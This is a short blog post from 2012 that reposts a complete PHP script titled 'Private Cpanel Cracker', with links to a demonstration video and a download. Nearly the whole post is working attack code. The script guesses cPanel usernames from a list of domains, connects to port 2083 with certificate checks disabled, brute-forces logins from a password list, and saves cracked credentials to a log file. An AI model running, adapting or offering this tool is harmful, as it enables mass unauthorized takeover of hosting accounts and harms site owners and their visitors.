noviembre 01, 2012
21:08

Cpanel cracker


http://www.youtube.com/watch?v=mLkudfIAPgA

DOWNLOAD - >>>>> http://dl.packetstormsecurity.net/Crackers/cpcracker.txt

<?php
set_time_limit(0);

/********************************************************************
* Private Cpanel Cracker
* Coded by Miyachung
* 
* Janissaries.Org
* Demonstration -> http://www.youtube.com/watch?v=mLkudfIAPgA
*********************************************************************/

class cracker
{

  public  $sitelist;
  public  $passlist;
  
  public function calis()
  {
      $usernames     =   $this->make_username();
      $sitelist    =  explode("\n",$this->openfile($this->sitelist));  
      $passlist    =  explode("\n",$this->openfile($this->passlist));
      $increment = 0;
      
      echo "\n\n[*]Site list -> $this->sitelist\n";
      echo "[*]Pass list -> $this->passlist\n";
      echo "[*]Total urls -> ".count($sitelist)."\n";
      echo "[*]Total pass -> ".count($passlist)."\n";
      echo "[*]Cracking started\n\n";
      
      foreach($sitelist as $id => $site)
      {
      $increment++;
      $site = trim($site);
      echo "-------------------------------------------------------\n";
      echo "[*]Trying site: ".$site." $increment / ".count($sitelist)."\n";
      if(eregi('http',$site)){
      $site = str_replace("http://","https://",$site);
      }else{ 
      $site = "https://$site";
      }
      $site= $site.":2083";
      
      if(!$this->pass_site($site))
      {
      echo "[-]Not cpanel,passing site\n";
      echo "-------------------------------------------------------\n\n";
      continue;
      }

      echo "[*]Connected Cpanel [OK]\n";
      echo "[*]Username: ".$usernames[$id]."\n";
      echo "[*]Loaded ".count($passlist)." passwords\n";
      echo "[*]Coded by Miyachung ||| Janissaries.Org\n";
        foreach($passlist as $pass)
        {
          $cracked = false;
          
          $pass=trim($pass);
          
          $result = $this->post($site,$usernames[$id],$pass);
          
          if(preg_match('/security_token/',$result))
          {
          $cracked = true;
          echo "[+]$pass password cracked for $usernames[$id]\n";
          echo "-------------------------------------------------------\n\n";
          $this->savefile("$site|$usernames[$id]|$pass");
          break;
          }
          
        }
      if(!$cracked){echo "[-]Not found\n";echo "-------------------------------------------------------\n\n";}
      }
  
  }
  
  private function make_username()
  {
      $op = explode("\n",$this->openfile($this->sitelist));
      foreach($op as $site)
      {
      
      if(eregi('http://',$site)) $site  = str_replace("http://","",$site);
      if(!eregi('www',$site))     $site  = "www.".$site;
      
      $site  =  explode(".",$site);
      $site  = str_replace("-","",$site[1]);
      
      $usernames[] = substr($site,0,8);
      
      }
      return $usernames;
  }
  
  public function lists()
  {
      echo "[!]Site list: ";
      $sitelist = fgets(STDIN);
      $sitelist = str_replace("\r\n","",$sitelist);
      $sitelist = trim($sitelist);
      echo "[!]Pass list: ";
      $passlist = fgets(STDIN);
      $passlist = str_replace("\r\n","",$passlist);
      $passlist = trim($passlist);
      
      return array($sitelist,$passlist);
  }
  
  private function post($site,$user,$pass)
  {
      $curl = curl_init();
      curl_setopt($curl,CURLOPT_RETURNTRANSFER,true);
      curl_setopt($curl,CURLOPT_URL,$site."/login/?login_only=1");
      curl_setopt($curl,CURLOPT_SSL_VERIFYHOST,0);
      curl_setopt($curl,CURLOPT_SSL_VERIFYPEER,0);
      curl_setopt($curl,CURLOPT_TIMEOUT,7);
      curl_setopt($curl,CURLOPT_FOLLOWLOCATION,true);
      curl_setopt($curl,CURLOPT_POST,1);
      curl_setopt($curl,CURLOPT_POSTFIELDS,"user=$user&pass=$pass");
      $exec = curl_exec($curl);
      return $exec;
  }
  
  private function pass_site($site)
  {
      $curl = curl_init();
      curl_setopt($curl,CURLOPT_RETURNTRANSFER,true);
      curl_setopt($curl,CURLOPT_URL,$site);
      curl_setopt($curl,CURLOPT_SSL_VERIFYHOST,0);
      curl_setopt($curl,CURLOPT_SSL_VERIFYPEER,0);
      curl_setopt($curl,CURLOPT_FOLLOWLOCATION,true);
      curl_setopt($curl,CURLOPT_TIMEOUT,7);
      $exec = curl_exec($curl);
      $info = curl_getinfo($curl);
      
      if($info['http_code'] != 0)
      {
      return true;
      }
      else
      {
      return false;
      }
  
  }
  
  private function openfile($file)
  {
      $file = @file_get_contents($file);
      if(!$file) exit("WTF File not found ?");
      return $file;
  }
  
  private function savefile($content)
  {
      $file = fopen('crackerlog.txt','ab');
      fwrite($file,$content."\r\n");
      fclose($file);
      return $file;
  }

}

$class           =     new cracker();
$lists           =     $class->lists();

      if(empty($lists[0]) || empty($lists[1])) exit("WTF Empty ? "); 
      
$class->sitelist     =     $lists[0];
$class->passlist     =     $lists[1];
$class->calis();


?>